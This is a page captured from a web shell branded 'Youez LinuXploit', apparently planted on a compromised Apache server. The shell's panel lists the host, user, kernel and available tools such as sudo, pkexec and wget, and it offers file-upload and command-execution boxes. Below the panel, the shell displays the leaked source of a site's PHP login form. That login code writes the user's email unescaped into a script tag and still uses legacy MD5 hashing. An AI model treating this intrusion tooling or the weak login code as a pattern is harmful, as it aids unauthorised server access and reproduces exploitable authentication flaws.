403Webshell
Server IP : 104.21.21.239  /  Your IP : 216.73.216.11
Web Server : Apache/2.4.68 (Amazon Linux) OpenSSL/3.5.5
System : Linux ip-172-31-69-123.ec2.internal 6.1.176-223.369.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Jul 24 13:34:27 UTC 2026 x86_64
User : ec2-user ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/mitzvahm/wwwdevplanner/mod/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/mitzvahm/wwwdevplanner/mod/_pagetop_form_login.php
<?php
	include_once('_form_header.php');
	session_start();
	
	if ($_POST['ajax_login_submitted'] == '1') :
		if (empty($_POST['user_id']) || $_POST['user_id'] == 'Enter user ID (email)') :
			$err_login = 'Invalid login credentials!';
			$err_flag = true;
			$form_user_id = 'Enter user ID (email)';
		endif;
		if (empty($_POST['login_pwd'])) :
			$err_login = 'Invalid login credentials!';
			$err_flag = true;
			$form_user_id = 'Enter user ID (email)';
		endif;
		if (!$err_flag) :
			$sql = "SELECT * FROM users WHERE email = '".mysqli_real_escape_string($GLOBALS['con'], trim($_POST['user_id']))."' AND active = 1";
			//echo $sql.'<br />';
			$result = mysqli_query($GLOBALS['con'], $sql) or die('Database Error!');
			//echo $sql.' result: '.mysqli_num_rows($result);
			if (mysqli_num_rows($result) > 0) :
				$row = mysqli_fetch_object($result);
				//echo '<br/>DB password: '.$row->password.'<br/>Form password: '.mysqli_real_escape_string($GLOBALS['con'], trim($_POST['login_pwd']));
				if (empty($row->password2) && !empty($_POST['salt2'])  && !empty($_POST['pwd_new_sha'])) :
					if (md5($_SESSION['login_token1'].$row->password.$_SESSION['login_token2']) == mysqli_real_escape_string($GLOBALS['con'], trim($_POST['login_pwd']))) :
						$sql = "UPDATE users set ".
							"salt = '".mysqli_real_escape_string($GLOBALS['con'], trim($_POST['salt2']))."', ".
							"password2 = '".mysqli_real_escape_string($GLOBALS['con'], trim($_POST['pwd_new_sha']))."', ".
							"password = NULL ".
							"WHERE id = ".$row->id;
						mysqli_query($GLOBALS['con'], $sql) or die('Database Error!');
						$row->password2 = trim($_POST['pwd_new_sha']);
						$_POST['login_pwd'] = hash('sha512', $_SESSION['login_token1'].$row->password2.$_SESSION['login_token2']);
					endif;
				endif;
				if (hash('sha512', $_SESSION['login_token1'].$row->password2.$_SESSION['login_token2']) == mysqli_real_escape_string($GLOBALS['con'], trim($_POST['login_pwd']))) :
					$_SESSION['user_id'] = $row->id;
					$_SESSION['logged_in'] = true;
					$_SESSION['username'] = mysqli_real_escape_string($GLOBALS['con'], trim($_POST['user_id']));
					$_SESSION['user_first_name'] = $row->first_name;
					$_SESSION['user_last_name'] = $row->last_name;
					$_SESSION['active_event'] = $row->active_event;
					$_SESSION['rand_key'] = generate_random_string(32);
					$_SESSION['delegate'] = $row->delegate;
					write_log('I', $_SESSION['user_id'], 'User '.$_SESSION['user_first_name'].' '.$_SESSION['user_last_name'].' logged on');
					if ($_POST['remember_me'] == 1) :
						echo "<SCRIPT>setCookie('MitzvahPlanner_UserEmail','".$_SESSION['username']."',180);</SCRIPT>";
					else :
						echo "<SCRIPT>setCookie('MitzvahPlanner_UserEmail','".$_SESSION['username']."',-180);</SCRIPT>";
					endif;
					echo "<SCRIPT>";
					echo "setCookie('MitzvahPlanner_Customer','true',9999);";
					echo "window.location.href = 'index.php?IX=ez_guide'";
					echo "</SCRIPT>";
				else :
					$err_login = 'Invalid login credentials!';
					$err_flag = true;
					$form_user_id = 'Enter user ID (email)';
				endif;
			else :
				$err_login = 'Invalid login credentials!';
				$err_flag = true;
				$form_user_id = 'Enter user ID (email)';
			endif;
		endif;
	else:
		if ($_COOKIE['MitzvahPlanner_UserEmail'] > '') :
			$remember_me = 'checked="checked"';
			$form_user_id = $_COOKIE['MitzvahPlanner_UserEmail'];
		else :
			$remember_me = '';
			$form_user_id = 'Enter user ID (email)';
		endif;
	endif;

	function show_login_form_error($err_text)
	{
		if (!empty($err_text)) :
			echo '<br /><div class="login_form_error">'.$err_text.'</div>';
		endif;
	}
	
?>

<script>
	validate = function(jqForm, options)
	{
		var form = jqForm[0]; 
		if (form.login_pwd.value) 
		{
			$.ajax({
				url: "ajax.php?call=login_tokens&email=" + encodeURIComponent(form.user_id.value),
				cache: false,
				dataType: "json",
				async: false,
				success: function(json) {
						if (json.salt > ' ')
						{
							form.login_pwd.value = json.token1 + CryptoJS.SHA512(json.salt + form.login_pwd.value) + json.token2;
						}
						else
						{
							form.salt2.value = json.salt2;
							form.pwd_new_sha.value = CryptoJS.SHA512(json.salt2 + form.login_pwd.value);
							form.login_pwd.value = json.token1 + MD5(form.login_pwd.value) + json.token2;
						}
				}
				 ,error: function (request, status, error) { /* alert("Login form error!  Please contact technical support and provide them with the following information: Status: " + status + ", Error: " + error); */ }
			})
			if (form.salt2.value)
			{
				form.login_pwd.value = MD5(form.login_pwd.value);
			}
			else
			{
				form.login_pwd.value = CryptoJS.SHA512(form.login_pwd.value);
			}
		}
		return true;
	}
</script>

<form style="" name="frm_login" id="frm_login" method="post" action="mod/_pagetop_form_login.php">
	<div style="float:right; width:325px; margin-right:5px; background-color:#cbdfdc; border-radius:3px; padding:12px 16px;">
		<input name="ajax_login_submitted" type="hidden" value="1" />
		<input name="salt2" id="salt2" type="hidden" value="" />
		<input name="pwd_new_sha" id="pwd_new_sha" type="hidden" value="" />
		<input class="login_text" name="user_id" style="width:190px;" id="user_id" type="text" maxlength="40" value="<?php echo $form_user_id; ?>" onblur="if (this.value == '') {this.value = 'Enter user ID (email)';}"  onfocus="if (this.value == 'Enter user ID (email)') {this.value = '';}"  />
		<input class="login_text" name="login_pwd_mask" style="width:110px; float:right;" id="login_pwd_mask" type="text" maxlength="150" value="Enter password" onfocus="$(this).hide(); $('#login_pwd').show(); $('#login_pwd').focus();"  />
		<input class="login_text" name="login_pwd" id="login_pwd" type="password" style="display:none; width:110px; float:right;" maxlength="160" value="" onblur="if (this.value == '') {$(this).hide(); $('#login_pwd_mask').show();}"   />
		<br />
		<a href="index.php?IX=pwd_reset" class="small_text">Forgot password?</a>
		<input name="remember_me" type="checkbox" value="1" <?php echo $remember_me; ?> style="" />
		<span style="font-size:11px; ">Remember me</span>
		<input type="submit" class="button_login" style="float:right;" value="Login" />
		<?php show_login_form_error($err_login) ?>
	</div>
</form>

<script language="javascript" type="text/javascript">
	var options = { 
		target:     '#div_login_form' ,
		beforeSerialize: validate
		}; 
	$('#frm_login').ajaxForm(options); 
</script>

Youez - 2016 - github.com/yon3zu
LinuXploit